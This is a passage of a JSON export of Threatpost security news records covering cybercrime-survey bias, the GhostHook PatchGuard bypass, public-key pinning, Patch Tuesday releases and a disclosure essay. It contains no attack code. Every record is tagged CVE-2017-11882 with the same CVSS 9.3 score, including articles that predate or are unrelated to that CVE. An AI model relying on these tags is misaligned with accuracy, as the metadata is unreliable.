ratchet up the numbers when they try to scale small survey groups to the overall population. The two also single out the adverse effect \u2018unverified outliers\u2019 can have on data. In their research, 90 percent of estimates are skewed by input from one or two individuals. \u201cUpward bias\u201d \u2013 a tendency of overstating a general phenomenon based on statistical evidence \u2013 permeated all of the surveys the two looked over, according to the piece.\n\nThe editorial draws from a paper issued by Herley and Flor\u00eancio; \u201cSex, Lies and Cyber-crime Surveys\u201d in which the two researchers [reasoned that cyber crime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>) are \u201cso compromised and biased that no faith whatever can be placed in their findings.\u201d When the research was published the duo called their assessment harsh but insisted that when it comes to security research, unreliable data is just masquerading as reliable data.\n\nThe thoughts also echo some that Herley, a principal researcher at Microsoft, has expressed before. In 2009, Herley challenged the concept that the underground cyber crime community\u2019s size and vitality are forces to be reckoned with.\n\nIn a June 2009 [podcast with Threatpost editor Dennis Fisher](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) still applicable today, Herley rationalized that it\u2019s hard to get an accurate reading on some security metrics and that the value of the underground economy was being oversold.\n\nIn a recent publication for IEEE Security And Privacy Magazine, Herley [took a similar, contrarian stance against popular coverage of banking fraud](<https://threatpost.com/money-mules-not-customers-real-victims-bank-fraud-032712/>), noting that money mules, not the account holders were the most victimized by online bank heists. \n", "cvss3": {}, "published": "2012-04-17T18:33:53", "type": "threatpost", "title": "Errors, Outliers Obscure Cybercrime Losses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:26", "id": "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "href": "https://threatpost.com/errors-outliers-obscure-cybercrime-losses-041712/76449/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A bypass of PatchGuard kernel protection in Windows 10 has been developed that brings rootkits for the latest version of the OS within reach of attackers.\n\nSince the introduction of PatchGuard and DeviceGuard, very few 64-bit Windows rootkits have been observed; Windows 10\u2019s security, in particular its mitigations against memory-based attacks, are well regarded. Researchers at CyberArk, however, found a way around PatchGuard through a relatively new feature in Intel processors called Processor Trace (Intel PT).\n\nThe bypass, which has been nicknamed [GhostHook](<https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/>), is a post-exploitation attack and requires an attacker already be present on a compromised machine and running code in the kernel. As a result, Microsoft said it will not patch the issue, but may address it in a future version of Windows, CyberArk said. ~~A request for comment from Microsoft was not returned in time for publication.~~\n\n\u201cThis technique requires that an attacker has already fully compromised the targeted system. We encourage our customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers,\u201d a Microsoft representative said in a statement provided to Threatpost.\n\nCyberArk concedes this may be a difficult fix for Microsoft, and said the quickest path to a fix may come from security vendors whose products hook in to PatchGuard. Intel PT, which was released months after PatchGuard, enables security vendors to monitor stacks of commands that are executed in the CPU in order to identify attacks before they reach the operating system.\n\n\u201cWe are able to execute code in the kernel and go unnoticed by any security feature Microsoft produces,\u201d said Kobi Ben Naim, senior director of cyber research. \u201cMany other security vendors rely on PatchGuard and on DeviceGuard in order to receive reliable information and analyze whether it\u2019s benign or an attack. This bypass enables us to go unnoticed versus the security vendors we checked (this includes antimalware, firewalls, host-based intrusion detection and more) that rely on those security layers to provide reliable information.\u201d\n\nNaim said that such an attack is within the realm of a nation-state attacker and that some well known targeted intrusions such as Flame and Shamoon make use of 64-bit malware to establish a foothold on machines and networks. Naim warned as well that if exploit code were to become public and criminal operations were able to execute ransomware through this technique, the results could be \u201ccatastrophic.\u201d\n\nNaim said Microsoft is making a mistake in not addressing this issue sooner.\n\n\u201cWe got an answer from Microsoft saying that because you are already an administrator on the machine, it\u2019s already compromised. But in this case, it\u2019s the wrong answer,\u201d Naim said. \u201cAll of those new security layers weren\u2019t designed to combat administrators or code that runs with administrator rights. This is a problematic answer [from Microsoft].\u201d\n\nCyberArk contends that the weakness is in Microsoft\u2019s implementation of Intel PT, specifically at the point where Intel PT talks to the OS.\n\n\u201cThe Intel feature is an API that the kernel code can ask to receive and read information from the CPU. The way that Microsoft implemented this API is the issue we found,\u201d Naim said. \u201cThis enabled us to not only read information but enter our code into a secure location in the kernel.\u201d\n\nAn attacker interacting at that layer can run code of their choosing and do so quietly without being detected by any number of security technology, CyberArk said.\n\n\u201cIt\u2019s very important to say that PatchGuard itself is a very strong mechanism, and the fact is we haven\u2019t seen any rootkits since it was introduced in Windows 10,\u201d Naim said.\n\nCyberArk said it will make enough of its attack public to demonstrate that it\u2019s feasible and enable security vendors to ready patches from their end.\n\nKaspersky Lab released a statement:\n\n> \u201cKaspersky Lab is aware of the hooking technique described by CyberArk researchers, that allows using Intel processor\u2019s feature to circumvent Windows\u2019 security. As conducting such an attack would require that a hacker is already running code in the kernel, this hooking technique doesn\u2019t significantly extend an attack surface.\u201d\n\nNaim said CyberArk has not seen this type of attack in the wild, but believes nation-states are using it.\n\n\u201cWe think attackers are already using it in country- or military-grade malware,\u201d Naim said, adding that by examining research on Flame and Shamoon, nation-states are close to executing against this type of vulnerability.\n\n\u201cWe think it\u2019s pretty critical,\u201d Naim said. \u201cThe real impact is if an attacker uses it, they can go uncovered for many months before someone will notice something is wrong. If we can take this capability and add it to ransomware, it would be pretty catastrophic. No player will be able to stop them once they are executing code behind PatchGuard. Today ransomware works in user mode because of PatchGuard. If they were able to execute this code behind PatchGuard, it will be a catastrophic effect.\u201d\n\n_This article was updated June 22 with a comment from Microsoft and Kaspersky Lab._\n", "cvss3": {}, "published": "2017-06-22T11:25:39", "type": "threatpost", "title": "GhostHook Attack Bypasses Windows 10 PatchGuard", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-22T19:10:38", "id": "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "href": "https://threatpost.com/ghosthook-attack-bypasses-windows-10-patchguard/126462/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:51", "description": "Microsoft is considering adding public-key pinning\u2013an important defense against man-in-the-middle attacks\u2013to Internet Explorer.\n\nThe feature is designed to help protect users against the types of MITM attacks that rely on forged certificates, which comprise a large portion of those attacks. Attackers use forged or stolen certificates to trick victims\u2019 browsers into trusting a malicious site that the attacker controls. Public-key pinning helps prevent those attacks by binding a set of public keys issued by a trusted certificate authority to a specific domain. With that defense in place, if the user visits the site and is presented with a key that\u2019s not part of the pinned set, the browser will reject the secure connection.\n\nPublic-key pinning as an extension to HTTP is laid out in an Internet-Draft submitted to the IETF by a group of Google security engineers in October. The [draft](<http://tools.ietf.org/html/draft-ietf-websec-key-pinning-21>) makes it clear that in order for the system to work, site operators must be up to the task.\n\n\u201cDeploying PKP safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a (set of) SPKI(s) that becomes invalid. With care, host operators can greatly reduce the risk of main-in-the-middle (MITM) attacks and other false-authentication problems for their users without incurring undue risk,\u201d the specification says.\n\nBut in order for the system to work, browsers must support it, as well. Google Chrome already ships with public-key pinning support, and Mozilla Firefox 32, which debuted in September, also includes the feature. Now, Microsoft has public-key pinning [under consideration](<https://status.modern.ie/publickeypinningextensionforhttp>) for inclusion in Internet Explorer, too.\n\nMITM attacks come in a variety of flavors, but one of the key components in many of them is the use of a forged certificate. In order to fool a user\u2019s browser into trusting a site that the attacker controls, the attacker can present a stolen or forged certificate for the site, This happens fairly regularly, and the technique has come up in some high-profile attacks in the last few years. In 2011, an attacker [compromised Dutch CA DigiNotar](<https://threatpost.com/what-you-need-know-about-diginotar-hack-090211>) and issued himself valid certificates for a number of high-value domains, including those belonging to Google, Yahoo and Mozilla.\n\nEarlier that same year, an attacker\u2013who may have been the same one to compromise DigiNotar\u2013[penetrated Comodo](<https://threatpost.com/phony-ssl-certificates-issued-google-yahoo-skype-others-032311>), another CA, and pulled the same stunt, issuing certificates for Mozilla, Skype and Yahoo domains. The public-key pinning mechanism has the potential to defeat the attacks that result from these kind of CA compromises by locking in a known-good set of keys for a given domain.\n", "cvss3": {}, "published": "2014-11-14T07:42:48", "type": "threatpost", "title": "Microsoft Considering Public-Key Pinning for Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T12:09:37", "id": "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "href": "https://threatpost.com/microsoft-considering-public-key-pinning-for-internet-explorer/109365/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:39", "description": "Microsoft issued nine bulletins fixing 16 vulnerabilities in the July 2012 edition of Patch Tuesday. Three of the bulletins received Microsoft\u2019s most severe \u2018critical\u2019 rating, while the remaining six were deemed merely \u2018important.\u2019\n\nFirst and foremost among the critical patches is [MS12-043](<http://go.microsoft.com/fwlink/?LinkID=254824>), a fix for the publicly disclosed and widely publicized XML core services vulnerability that was [actively exploited last month](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Affecting Microsoft Windows, Office, Developer Tools and Server Software, it allowed attackers to execute code remotely after tricking victims into visiting a malicious website in Internet Explorer.\n\n[MS12-044](<http://go.microsoft.com/fwlink/?LinkId=254377>), also critical, is a cumulative security update for Internet Explorer resolving two privately reported bugs that, if unpatched, could allow an attacker to remotely execute code if a user visits a specially crafted webpage using Internet Explorer. Successful exploitation could grant the attacker user-rights, which, as always, will be more troublesome for users who operated with administrative rights.\n\nThe final critical bulletin, [MS12-045](<http://go.microsoft.com/fwlink/?LinkId=254441>), resolves one privately disclosed vulnerability in the data access components of Windows. Like the previous bulletin, this could potentially lead to remote code execution if the user visits a specially crafted website and allow the attacker to gain the same user rights as the current user.\n\nThe remaining \u2018important\u2019 bulletins resolve 12 vulnerabilities altogether, specifically, one bug in Visual Basic for Applications and another in the Windows Shell that could allow for remote code execution. The fix also covers two elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers, six in SharePoint, and one more in Office for Mac, in addition to an information disclosure bug in TLS.\n\nYou can find the entire TechNet announcement [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-10T19:23:26", "type": "threatpost", "title": "Three Critical Fixes in July Microsoft Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:28", "id": "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "href": "https://threatpost.com/three-critical-fixes-july-microsoft-patch-tuesday-071012/76785/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.\n\nThis is how it\u2019s been done since shortly after Bill Gates\u2019 Trustworthy Computing memo in 2002 set Microsoft on its course of secure software development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of a scheduled patch delivery?\n\nSure enterprises may be engrained in this rote consumption of security fixes on the second Tuesday of every month, but given that Microsoft is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company\u2019s [vaunted Trustworthy Computing group disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft, Patch Tuesday may showing some signs of cracking.\n\nOutside forces aren\u2019t helping much. Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google\u2019s Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft\u2014or any vendor for that matter. And once the 90 days are up, disclosure is full and angst is high.\n\n**Patch Quality in Crosshairs**\n\nInternally, since TWC in September was integrated into Microsoft\u2019s cloud and enterprise group\u2014coinciding with more than 2,100 layoffs, including several key security people\u2014eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Microsoft\u2019s sChannel, the SSL/TLS implementation in Windows, was patched in November but within days, the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). It was re-issued in short order, but coincidently or not, the situation did not endear anyone to the reorg going on in Redmond.\n\nEven going into today\u2019s Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users that last week was made public along with proof-of-concept code, still is unpatched and Microsoft has been silent on when a fix is coming. That silence, could in part, be due to the fact that the company recently [discontinued providing users with advanced notification of patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>), making them available only to premier support customers. Perhaps, security will stop being a marketing differentiator for Microsoft.\n\n\u201cThey\u2019re not going to get rid of security, but like Apple, put it more behind the scenes,\u201d said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. \u201cIt\u2019s not going to be the thing they talk about most. It distracts from them being a software and technology company.\u201d\n\nMicrosoft\u2019s QA testing of patches is extensive and reportedly separate from the Microsoft Security Resource Center (MSRC) and TWC, which focuses on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to be included in a timely fashion to Windows Update. Patches are also tested against third party applications, and Microsoft will insist that patch quality issues have little to do with TWC changes and more to do with advanced and changing threats.\n\n\u201cMicrosoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. There are many factors that can impact the length of testing,\u201d said Chris Betz of the MSRC in a statement provided to Threatpost. \u201cOnce the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release.\u201d\n\nMicrosoft\u2019s focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday, say for automatic silent patching, a la Google\u2019s updates to Chrome, for example, experts said.\n\n\u201cThe bigger factor that surrounds things like Patch Tuesday is that threats have changed,\u201d Maiffret said. \u201cOrganizations like governments or anyone who is a high-value target, has a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That\u2019s a big part of it: security moving away from the value of one individual vulnerability.\u201d\n\n**Automatic Patching Has Its Place**\n\nMicrosoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while its partner programs such as Microsoft Active Protections Program give participating enterprises and vendors a head\u2019s up on vulnerability details in order to coordinate patch delivery with interdependent products.\n\n\u201cEach customer is unique with varying needs based on their technology environments. With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide,\u201d said Betz. \u201cCustomers are also increasingly taking advantage of Microsoft Update to automatically provide updates.\u201d\n\nAttackers, however, have the luxury of being able to focus on one bug, but defenders have to look at the biggest risks to their respective environments, hoping they make the right assessments and prioritizations. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have been providing attackers with much more tempting targets of late. Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause with regard to going to an automated process.\n\n\u201cI think people would like to be in automatic mode. There\u2019s a huge value to set-it-and-forget-it, but there\u2019s still a risk involved and it\u2019s difficult for people to consume that risk not knowing what could happen,\u201d said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. \u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time; if I were a CIO, I would be drooling.\u201d\n\nThat, of course, depends on patches that are good to go out of the box, so to speak.\n\n\u201cAny business at the scale of Google or Microsoft have so many complexities that there are going to be unforeseen interactions,\u201d said Tripwire security researcher Craig Young. \u201cThat\u2019s why enterprises test patches in a controlled environment to make sure they don\u2019t breach critical business applications before rolling them out to systems. That works. The Chrome model is probably not appropriate if you\u2019re a hospital where all your terminals need a web app interface with insurance providers and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?\u201d\n\n**Environment to Dictate Patching Styles**\n\nKatie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in the development of Microsoft\u2019s coordinated disclosure program and developing strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development where quality and speed go hand in hand. This takes on more relevance with the so-called Internet of Things, where embedded computers often don\u2019t have simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.\n\n\u201cPatching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing,\u201d Moussouris said. \u201cMobile devices are difficult to patch, and are not patched on anyone\u2019s schedule. Many are not designed to be patched either; they\u2019re designed to be upgraded or thrown away in two years.\u201d\n\nMicrosoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer have made buffer overflow vulnerabilities less of a hassle than a decade ago. Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.\n\n\u201cMicrosoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard,\u201d Maiffret said. \u201cI hope they keep their eye on mitigations, not just EMET but also the underlying operating system.\u201d\n\nFor the time being, Microsoft won\u2019t retire Patch Tuesday and its high-paying enterprise customers likely won\u2019t let them. And in the end, Patch Tuesday is still relevant on many fronts, and the processes are still superior to many third-party patching processes.\n\n\u201cStepping back, you have to ask: \u2018What\u2019s the relevance of Microsoft vulnerabilities in attacks and exploits?'\u201d Maiffret said. \u201cMicrosoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you\u2019re seeing an increase of third-party apps in targeted attacks. That\u2019s the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. That mirrors what\u2019s happening from the attackers\u2019 perspective; it\u2019s just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:49", "type": "threatpost", "title": "Creaking Patch Tuesday's Viability Rests with Quality, Speed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-11T12:02:27", "id": "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "href": "https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:46", "description": "Microsoft announced today that it plans on shipping seven bulletins, five critical, two important, for the [December edition](<http://technet.microsoft.com/en-us/security/bulletin/ms12-dec>) of its monthly patch Tuesday security bulletin release cycle.\n\nThe year\u2019s last scheduled batch of patches will address 11 vulnerabilities in all currently supported operating systems, including Microsoft Windows, Internet Explorer (IE 6-10), Office and the company\u2019s Server Software.\n\nIf left unpatched, six of the seven bulletins could lead to remote code execution while the last could allow a hacker to bypass one of Windows\u2019 security features.\n\nQualys\u2019 Wolfgang Kandek notes on the company\u2019s [Laws of Vulnerabilities blog](<http://laws.qualys.com/2012/12/december-2012-patch-tuesday-pr.html>) that the third bulletin, rated critical, affects Microsoft Word, suggesting the vulnerability may leverage Outlook to display documents without the users\u2019 interaction.\n\nThe bulletin summaries will be released in their entirety next Tuesday, December 11 and per usual, the company is set to host a [Technnet webcast](<https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032522564&Culture=en-US>) discussing the vulnerabilities and patch management practices the following day, December 12 at 11 a.m.\n", "cvss3": {}, "published": "2012-12-06T19:07:50", "type": "threatpost", "title": "Microsoft Fixing 11 Vulnerabilities for December Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:07", "id": "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "href": "https://threatpost.com/microsoft-fixing-11-vulnerabilities-december-patch-tuesday-120612/77289/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)\n\nQuite often in our industry, two (or five) people can look at the same problem from different angles, and see radically different things. Rare is the situation that reads the same to everyone, forwards and backwards. It\u2019s all about perspective.\n\nIn my appearance on the \u2018[Partial Disclosure Dilemma\u2019 Panel](<http://blogs.msdn.com/katie_moussouris/archive/2009/03/09/the-partial-disclosure-dilemma-panel-at-sourceboston.aspx>) at [SOURCEBoston](<http://www.sourceconference.com/index.php/source-boston-2009>) this year, I found myself surrounded by great minds who most certainly do not think alike. While there was some agreement and common ground between all parties on the dais, namely wanting to make the Internet safer and protecting people, there was little agreement on the best way to accomplish that goal.\n\nThe conversation between us friends and colleagues, both on stage and in the audience, wended its way down many tangential paths, most of which I will have to watch again on the video to fully understand how we got from Partial Disclosure to Dan Kaminsky saying \u201cMore people have died from windows crashing on them than from Windows crashing.\u201d But I promised my redux of the panel, so I will guide you down the path I think was most interesting.\n\n**[ **[**Partial disclosure, complete disagreement**](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)** ]**\n\nThe disclosure issues around [Dan Kaminsky\u2019s DNS vulnerability](<http://www.ioactive.com/docs/CERTAdvisory.doc>) were one seed of the panel idea. If you are reading this blog, then I will assume that you\u2019ve heard of this vulnerability, else you must have been living under an Amish rock in a Luddite colony, high in the brisk, thin air of the Himalayas.\n\nAs far as the disclosure route he chose and how that played out, he executed a plan he thought was best in order to get vendors to fix a serious issue (they did), *and* to get as many affected customers protected (some were) with the fix in place before broadly releasing the technical details. He let a small number of people know the details, in the hopes that delivering those details to the right people and no one else would best protect the world\u2019s critical infrastructure. Hence, the term \u2018partial disclosure\u2019 was used to describe his approach. Other notable researchers [thought it was just hype](<http://twitter.com/tqbf/statuses/853104857>), [then took it back once they had spoken to Dan](<http://www.matasano.com/log/1089/dan-kaminsky-could-have-made-hundreds-of-thousands-of-dollars-with-this-dns-flaw/>), [some pretty much figured it out on their own](<http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html>), or [chatted about it on DailyDave](<http://lists.immunitysec.com/pipermail/dailydave/2008-July/thread.html>). It was [weaponized](<http://blog.metasploit.com/2008/07/bailiwicked.html>) shortly thereafter, and a couple weeks after his initial announcement, some affected people had applied the update and some unfortunately hadn\u2019t. There were certainly more details I\u2019m skipping here, but that\u2019s the skinny.\n\nNow that the panel stage was set, here\u2019s one of the topics I thought was interesting.\n\nIn our introductions, we each counted ourselves among the security research community. Some of us had also been or still are consultants, all of us had done the startup thing, and some of us had been in charge of running some kind of computing infrastructure. \nAt the risk of sounding immodest, I believe I had a unique perspective on the topic of responsible disclosure as I was the only panel member who has been, at various stages in my career, a vulnerability Finder, Coordinator, and a Vendor (for both open and closed source software).\n\nLet my official punditry from this pugnacious pulpit begin. \ud83d\ude09\n\nIt was interesting to me that the panelist who most strongly endorsed \u201cinflicting pain\u201d in the form of exploit release in order to provide the necessary \u201cwake up call\u201d to vendors had never been responsible for maintaining any kind of infrastructure deployment. We all know how much easier it is to break something than it is to build it or to fix it, yet there is a pervasive attitude among many security researchers that nothing should be more important than security, not even the business itself.\n\nAnd that\u2019s where our disagreement\u2019s footing took a stronger hold on its rocky purchase. Define pain, our moderator asked. Who decides on the form the pain will take and how intense or widespread it is, I asked.\n\nSure, it took some [pain](<http://news.cnet.com/At-software-giant,-pain-gives-rise-to-progress/2009-7349_3-6220566.html>) to get the [attention](<http://blogs.msdn.com/sdl/archive/2009/02/18/early-days-of-the-sdl-part-one.aspx>) of software vendors to fix their products and [build security in from the ground up](<http://blogs.msdn.com/sdl>). But as security folks, aren\u2019t we tired of having to use the same arguments of active, widespread exploitation to*prove* that something needs to be done? Security people often complain that not enough has changed since the [epoch began](<http://en.wikipedia.org/wiki/Unix_epoch>), but if that\u2019s true, then why have we not looked at ways to stop beating our heads upon the supposed brick wall of vendors or deployers of technology, and instead tried something different to get the right eyes on the right issues at the right time to do the right thing? Doesn\u2019t executing the same behavior over and over again but expecting different results equal insanity? When are we willing to stop the madness?\n\nAt the end of the panel we were each asked to describe our security utopia. My Shangri-La was this: I would like to see more cross-over among those of us who say the sky is falling and those of us upon whom the sky will fall.\n\nCommunication between two groups with different mindsets requires a [lingua franca](<http://www.emergentchaos.com/archives/2009/02/boundary_objects_and_thre.html>) other than exploitation. One might think that math is the language of the universe, and Proof of Concept serves as the mathematical proof needed for anyone and everyone to arrive at the logical conclusion of \u201cdrop everything NOW and create (if you\u2019re a vendor) or apply (if you\u2019re managing infrastructure) the update.\u201d Before I had ever been responsible for building anything or protecting anything, I might have agreed with that, since it made perfect logical sense to me at the time, in the context within which I worked.\n\nBut it\u2019s not doing the trick of convincing all vendors and all deployers by a long shot, so obviously, we need something to change. PoC can and should be part of the conversation between responsible researchers and people to whom they are reporting the issues, but it must be framed appropriately for the listener. PoC is not that simple for non-security types to immediately frame the same way we do as security people. Even if they do grok the severity of the situation, they may not be *able* to move as quickly as a researcher feels they should.\n\nConsider this, researcher-types: If you\u2019ve never managed infrastructure before, or been responsible for shipping and maintaining complex and widely deployed code, then you don\u2019t have the context to understand why there are sometimes legitimate reasons to do things more carefully and therefore more slowly. Once the talk recordings are posted, check out the very thorough treatise by our own MSRC on [How Microsoft Fixes Security Vulnerabilities: Everything you wanted to know about the MSRC Security Update Engineering Process](<http://www.sourceconference.com/index.php/source-boston-2009/boston-2009-sessions>). Think about how you as a researcher and security expert would react if some CTO or IT person or developer who lacks your depth of security knowledge and subject matter expertise came and told you what to hack, how to hack, and at what pace to hack it? That\u2019s essentially what you\u2019re doing when you say \u201cyou should be able to fix it and fix it now, and if you don\u2019t do it on my timeline, then you obviously need to be made an example of so I\u2019m going to release an exploit for it into the wild.\u201d\n\nThey don\u2019t swim in your security research toilet :-), so why must you pee in their development or infrastructure pool?\n\nOkay, I couldn\u2019t resist making the joke \u2013 and no, I don\u2019t think [security research is a cesspool](<http://spiresecurity.typepad.com/spire_security_viewpoint/2005/03/not_again.html>), or I wouldn\u2019t have [founded two vulnerability research programs](<http://blogs.msdn.com/sdl/pages/about-us.aspx#k8e>) in my career. What I am saying is that all of us should be striving for the delicious harmony of combining your chocolate with my peanut butter, your gin and my tonic, your milk and my shake, in order to make the whole greater than the sum of its parts. As a researcher, one can choose to be the sabot and grind gears to a halt to prove a point, or one can be the grease that moves things along with less friction, earning the trust that will allow each subsequent notification pill to be swallowed more easily. As a developer or deployer, one can choose to stuff up one\u2019s ears until someone firmly inserts an icepick, or one can strive to fix things as quickly and safely as possible and learn from the experience to continually improve and speed up that process over time.\n\nWe need a better way to reach our common ground of protecting the computing environment on which we all rely. Researchers need a means by which to communicate urgency that avoids descriptive hyperbole or causes damage, which erodes trust. Developers and deployers need a better way to service existing code and infrastructure reliably, safely, and rapidly if necessary, to build trust among the researcher and customer communities that they are doing the best they can at any given time. Around here, we\u2019ve done serious work on making this a reality on the development front, with the dual-ninjas of SDL (proactive) and MSRC (reactive). I\u2019d like to see SDL someday brought up to a full double-D in the form of a Secure Development and Deployment Lifecycle, to build infrastructure design and servicing models that are resilient in the face of threats to deployments as well as software. Perhaps I can begin to work on this here at Microsoft, if I can get some of my [other work done first](<http://blogs.msdn.com/sdl/archive/2008/09/11/new-addition-to-the-starting-line-up.aspx>). \ud83d\ude42\n\nAfter we had each said our peace on what our security utopia looked like, that\u2019s where we left things. No agreement could be reached in the two hours or so we were on the stage, which is no surprise. If the tape ran out before the end, then you won\u2019t get to see us literally \u201chug it out\u201d after all was said and done, disagreements notwithstanding. I continue to have tremendous respect and share camaraderie with my fellow panelists and with researchers around the world. It is my hope that the determination and vision of those on any side of the equation who can see across the role boundaries of researcher, vendor, and deployer will usher us into a new age.\n\nPeople often ask what more is there to say about disclosure that hasn\u2019t already all been said. I think the real conversation on how to get the results we all desire \u2013 to get things fixed *in spite of* our disagreement \u2013 has yet to truly begin.\n\nI\u2019m listening, as well as talking. Are you?\n\n_* [Katie Moussouris](<http://blogs.msdn.com/katie_moussouris>) is a senior security program manager in Microsoft\u2019s Secure Development Lifecycle (SDL) team. \n_\n\n_Photo credit: Microsoft._\n", "cvss3": {}, "published": "2009-03-23T20:02:26", "type": "threatpost", "title": "Partial disclosure: Was it a cat I saw?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T17:57:44", "id": "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "href": "https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/72387/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-03T08:20:30", "description": "Attacks using malicious Microsoft macros, always a popular method for compromising target machines, are more virulent than ever, accounting for 45 percent of all delivery mechanisms 